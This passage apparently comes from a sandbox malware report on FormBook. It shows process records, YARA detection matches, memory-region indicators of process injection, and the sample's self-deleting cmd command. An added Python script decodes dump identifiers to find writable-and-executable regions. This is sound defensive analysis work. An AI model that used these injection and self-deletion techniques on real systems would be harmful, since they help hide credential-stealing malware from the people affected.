                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:16:04:07
                                              Start date:14/01/2022
                                              Path:C:\Windows\SysWOW64\wininit.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\wininit.exe
                                              Imagebase:0x6f0000
                                              File size:96256 bytes
                                              MD5 hash:B5C5DCAD3899512020D135600129D665
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate
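The Yara match lines in the four records above each carry a "Source:" dump identifier. Read across the page, the second Pcportk28.exe record (index 5) is typed as native code while the first is .NET, and its FormBook matches sit in regions at 0x400000, 0x320000 and 0x350000 with protection value 0x40, none of them at the reported image base 0x10e0000; that is consistent with the process-hollowing and PE-injection signatures listed at the top of the report. The following is an added example, not part of the Joe Sandbox report, that decodes those identifiers so the writable-and-executable hits can be pulled out per process. The field layout is an assumption read off this page's own values (process index, stage, dump id, address, page protection, region type); the protection field is decoded with the standard Windows PAGE_* constants, while stage and region type are kept raw. The sample identifiers are copied from the match lines above.

```python
"""Decoding the 'Source:' dump identifiers attached to the Yara matches above.

Added example, not part of the Joe Sandbox report. The field layout is an
assumption read off this page's own values:
    <process index>.<stage>.<dump id>.<address>.<page protection>.<region type>.sdmp
Indices 4 and 5 are the two Pcportk28.exe records, 6 is explorer.exe and 7 is
wininit.exe (each index appears under its own process record). Only the
protection field is decoded, using the Windows PAGE_* constants.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

SOURCE_RE = re.compile(
    r"(?P<proc>\d{8})\.(?P<stage>\d{8})\.(?P<dump>\d+)\."
    r"(?P<addr>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<rtype>[0-9A-Fa-f]{8})\.sdmp"
)

# Windows memory protection constants (the low byte of a VirtualQuery protection value).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    stage: int          # kept raw: 0 or 2 on this page, meaning not decoded here
    address: int
    protect: int
    region_type: int    # kept raw: not decoded here

    @property
    def protect_name(self) -> str:
        # Mask off modifier bits such as PAGE_GUARD (0x100) before the lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def writable_and_executable(self) -> bool:
        return (self.protect & 0xFF) in (0x40, 0x80)


def parse_source(text: str) -> DumpRegion:
    """Parse one dump identifier; the whole 'Rule: ..., Source: ...' line may be passed."""
    m = SOURCE_RE.search(text)
    if not m:
        raise ValueError(f"no dump identifier in: {text!r}")
    return DumpRegion(int(m["proc"]), int(m["stage"]), int(m["addr"], 16),
                      int(m["prot"], 16), int(m["rtype"], 16))


def wx_regions_by_process(lines):
    """Map process index -> sorted, de-duplicated addresses of writable+executable hits."""
    hits = defaultdict(set)
    for line in lines:
        r = parse_source(line)
        if r.writable_and_executable:
            hits[r.process_index].add(r.address)
    return {p: sorted(a) for p, a in hits.items()}


def hits_outside_image(lines, process_index, reported_imagebase):
    """Writable+executable hits for one process that are not at its reported image base.

    For the hollowed second Pcportk28.exe (index 5, reported base 0x10e0000) this
    returns 0x320000, 0x350000 and 0x400000: the FormBook code lives in regions
    that are not the original .NET image.
    """
    return sorted({r.address for r in map(parse_source, lines)
                   if r.process_index == process_index and r.writable_and_executable
                   and r.address != reported_imagebase})


# Copied from the Yara match lines on this page, one entry per distinct dump.
SAMPLE_SOURCES = [
    "00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp",
    "00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp",
    "00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp",
    "00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp",
    "00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp",
    "00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp",
    "00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp",
    "00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp",
    "00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp",
    "00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp",
]

if __name__ == "__main__":
    for proc, addrs in sorted(wx_regions_by_process(SAMPLE_SOURCES).items()):
        print(f"process {proc}: RWX Yara hits at " + ", ".join(f"0x{a:x}" for a in addrs))
```

Running it shows that the first Pcportk28.exe instance (index 4) has its FormBook matches only in PAGE_READWRITE heap regions, which fits an unpacked payload staged in memory before injection, while processes 5, 6 and 7 carry the matches in PAGE_EXECUTE_READWRITE regions, which is where injected code normally ends up.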

                                              General

                                              Start time:16:04:12
                                              Start date:14/01/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del "C:\Users\Public\Pcportk28.exe"
                                              Imagebase:0x4a4c0000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis
